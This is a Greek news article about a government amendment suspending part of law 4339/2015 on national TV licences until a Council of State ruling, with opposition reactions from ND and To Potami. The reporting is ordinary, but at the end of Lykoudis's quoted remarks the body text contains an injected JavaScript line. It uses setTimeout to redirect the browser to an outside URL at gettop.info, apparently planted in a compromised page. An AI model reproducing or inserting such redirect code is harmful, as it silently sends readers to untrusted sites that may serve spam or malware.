Κατατέθηκε στη Βουλή η τροπολογία Παππά – Έντονη αντίδραση της αντιπολίτευσης

0
13

 

Όπως το είχε προαναγγείλει ο υπουργός Επικρατείας κατέθεσε στη Βουλή την τροπολογία που προβλέπει την αναστολή της εφαρμογής του άρθρου 2Α του νόμου του για το ΕΣΡ και τον αριθμό των αδειών.
Η τροπολογία κατατέθηκε λίγα λεπτά πριν την έναρξη της συνεδρίασης της Διάσκεψης των Προέδρων της Βουλής για την συγκρότηση του ΕΣΡ και προκάλεσε έντονες αντιδράσεις από την πλευρά της αντιπολίτευσης.

Σύμφωνα με την τροπολογία προβλέπεται ότι μέχρι τη δημοσίευση της απόφασης του ΣτΕ αναστέλλονται τόσο τα αποτέλεσματα του πρόσφατου διαγωνισμού για τις τηλεοπτικές άδειες, από τον οποίο προέκυψαν οι τέσσερις υπερθεματιστές όσο και ο αριθμός των νέων τηλεοπτικών καναλιών εθνικής εμβέλειας. Σύφωνα με την κυβέρνηση, με τη νέα ρύθμιση επιστρέφουν οι αρμοδιότητες στο ΕΣΡ. Η τροπολογία θα συζητηθεί και θα ψηφιστεί την Πέμπτη.

Ειδικότερα, όπως αναφέρει η τροπολογία αναστέλλεται η εφαρμογή του άρθρου 2Α του ν. 4339/2015, όπως προστέθηκε με το άρθρο τρίτο του ν. 4367/2016, μέχρι την δημοσίευση της απόφασης του Συμβουλίου της Επικρατείας επί των αιτήσεων ακυρώσεως κατά των αναμερόμενων υπουργικών αποφάσεων, σχετικά με:

-Τον καθορισμό του αριθμού των δημοπρατούμενων αδειών παρόχων περιεχομένου επίγειας ψηφιακής τηλεοπτικής ευρυεκπομπής ελεύθερης λήψης εθνικής εμβέλειας ενημερωτικού προγράμματος γενικού περιεχομένου για μετάδοση υψηλής ευκρίνειας και

– Τον τρόπο διενέργειας της διαγωνιστικής διαδικασίας κατά την πρώτη εφαρμογή του.

Η τροπολογία που κατατέθηκε στη Βουλή

Αντιδράσεις από τη ΝΔ

Την αντίδραση της αξιωματικής αντιπολίτευσης προκάλεσε η νέα τροπολογία για τις τηλεοπτικές άδειες.

Σύμφωνα με τον βουλευτή της ΝΔ Νίκο Δένδια στη Διάσκεψη των Προέδρων, «δεν έχουν καν την γενναιότητα να ακυρώσουν τον νόμο απλά μόνο αναστέλλουν τις διατάξεις του μέχρι την καθαρογραφή της απόφασης του ΣτΕ λες και θέλουν να τον επαναφέρουν στη συνέχεια».

Ο Ν. Δένδιας επεσήμανε ότι η ΝΔ ζητά «την επιστροφή των αρμοδιοτήτων στο ΕΣΡ με νομοθετική παρέμβαση που θα την συμφωνήσουμε όλοι μαζί και θα την ψηφίσουμε όλοι μαζί».

Στη συνέχεια, υπογράμμισε ότι «αμέσως μετά – κυριολεκτικά αμέσως μετά – να συγκληθεί η Διάσκεψη των Προέδρων προκειμένου να συμφωνήσουμε στα πρόσωπα που θα στελεχώσουν το ΕΣΡ.

Ομως η απαραίτητη προϋπόθεση είναι να έρθει ο νόμος που επιστρέφει τις αρμοδιότητες στο ΕΣΡ».

Το Ποτάμι ζητεί αναδιατύπωση της τροπολογίας

«Είναι σαφές και πεντακάθαρο ότι δεν μπορεί να είμαστε διαχυμένοι στις εντυπώσεις. Ή καταργείται ή αναστέλλεται η διάταξη», είπε ο Σπύρος Λυκούδης από το Ποτάμι, για την τροπολογία της κυβέρνησης και ζήτησε να προβλεφθεί κατάργηση της διάταξης του νόμου 4339/2015 και όχι αναστολή, όπως η τροπολογία αναφέρει.

Η πρόταση που είχατε φέρει για τον κ. Μορώνη είχε τύχει ευμενέστατης αποδοχής, είπε ο κ. Λυκούδης και τόνισε ότι ο Γιάννης Τζαννετάκος θα μπορούσε να είναι πρόταση, όπως και ο κ. Σωτηρέλης, με το κύρος που έχει. Αναδιατυπώστε την τροπολογία και ξανασκεφτείτε το ζήτημα του προέδρου του ΕΣΡ, είπε ο κ. Λυκούδης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here